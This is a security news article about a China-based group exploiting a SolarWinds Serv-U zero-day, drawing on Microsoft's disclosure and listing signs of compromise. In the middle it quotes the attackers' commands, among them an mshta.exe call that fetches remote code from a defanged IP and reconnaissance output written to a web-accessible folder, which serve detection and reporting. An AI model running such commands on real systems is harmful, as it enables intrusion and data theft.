Chinese hackers use new SolarWinds zero-day in targeted attacks
China-based hackers known to target US defense and software companies are now targeting organizations using a vulnerability in the SolarWinds Serv-U FTP server.
Today, SolarWinds released a security update for a zero-day vulnerability in Serv-U FTP servers that allow remote code execution when SSH is enabled.
According to SolarWinds, this vulnerability was disclosed by Microsoft, who saw a threat actor actively exploiting it to execute commands on vulnerable customer’s devices.
Tonight, Microsoft revealed that the attacks are attributed with high confidence to a China-based threat group tracked as ‘DEV-0322.’
“This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,” says a new blog post by the Microsoft Threat Intelligence Center.
Microsoft says the DEV-0322 hacking group has previously targeted entities in the US Defense Industrial Base Sector and software companies.
“The DIB Sector is the worldwide industrial complex that enables research and development (R&D), as well as design, production, delivery, and maintenance of military weapons systems, subsystems, and components or parts, to meet U.S. military requirements,” explains a CISA document describing the DIB sector.
Also Read: 5 Most Frequently Asked Questions About Ransomware
Attacks detected by Microsoft 365 Defender telemetry
Microsoft says they first learned of the attacks after Microsoft 365 Defender telemetry showed a normally harmless Serv-U process spawning anomalous malicious processes.
Some of the commands executed through the remote code execution vulnerability are listed below.
C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
cmd.exe /c whoami > “./Client/Common/redacted.txt”
cmd.exe /c dir > “.\Client\Common\redacted.txt”
cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””
powershell.exe C:\Windows\Temp\Serv-U.bat
cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”“We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands,” Microsoft explains in their blog post.
Other commands would add a global admin user to the Serv-U FTP server configuration or launch batch files and scripts to likely install malware on the devices for persistence and remote access.
Microsoft says Serv-U users can check if their devices were compromised by checking the Serv-U DebugSocketLog.txt log file and looking for exception messages.
A “C0000005; CSUSSHSocket::ProcessReceive” exception could indicate that the threat actors attempted to exploit the Serv-U server, but the exception could be shown for other reasons as well.
An example exception seen in logs is displayed below.
EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5Other signs that a device may have been compromised are:
- Recently created .txt files under the Client\Common\ folder.
- Serv-U spawned processes for mshta.exe, powershell.exe, cmd.exe, and processes running from C:\Windows\temp.
- Unrecognized global users in the Serv-U configuration.
0 Comments